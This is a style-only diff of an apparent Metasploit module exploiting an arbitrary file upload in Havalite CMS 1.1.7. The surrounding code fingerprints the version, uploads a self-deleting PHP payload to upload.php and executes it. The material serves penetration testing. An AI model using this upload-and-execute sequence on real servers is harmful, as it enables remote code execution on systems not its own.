@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => "Havalite CMS Arbitary File Upload Vulnerability",
+        'Name' => 'Havalite CMS Arbitary File Upload Vulnerability',
         'Description' => %q{
           This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and
           possibly prior.  Attackers can abuse the upload feature in order to upload a
@@ -33,7 +33,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'BadChars' => "\x00"
         },
-        'Platform' => %w{linux php},
         'Targets' => [
           [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
@@ -65,15 +64,15 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = normalize_uri(target_uri.path, 'havalite/')
     res = send_request_raw({ 'uri' => uri })
 
-    if not res
-      vprint_error("Connection timed out")
+    if !res
+      vprint_error('Connection timed out')
       return Exploit::CheckCode::Unknown
     end
 
-    js_src = res.body.scan(/<script type="text\/javascript">(.+)<\/script>/im).flatten[0] || ''
+    js_src = res.body.scan(%r{<script type="text/javascript">(.+)</script>}im).flatten[0] || ''
     version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''
 
-    if not version.empty? and version =~ /1\.1\.7/
+    if !version.empty? and version =~ /1\.1\.7/
       vprint_status("Version found: #{version}")
       return Exploit::CheckCode::Appears
     end
@@ -85,11 +84,11 @@ class MetasploitModule < Msf::Exploit::Remote
   # Uploads our malicious file
   #
   def upload(base)
-    p = get_write_exec_payload(:unlink_self => true)
+    p = get_write_exec_payload(unlink_self: true)
     fname = "#{rand_text_alpha(5)}.php"
 
     data = Rex::MIME::Message.new
-    data.add_part(p, "application/octet-stream", nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
+    data.add_part(p, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{fname}\"")
     post_data = data.to_s
 
     res = send_request_cgi({
@@ -99,11 +98,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => post_data
     })
 
-    if not res
+    if !res
       fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
     elsif res.code.to_i == 404
       fail_with(Failure::NotFound, "#{peer} - No upload.php found")
-    elsif res.body =~ /"error"\:"abort"/
+    elsif res.body =~ /"error":"abort"/
       fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
     end
 
@@ -126,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     base = target_uri.path
 
-    print_status("Uploading malicious file...")
+    print_status('Uploading malicious file...')
     fname = upload(base)
 
     print_status("Executing #{fname}...")
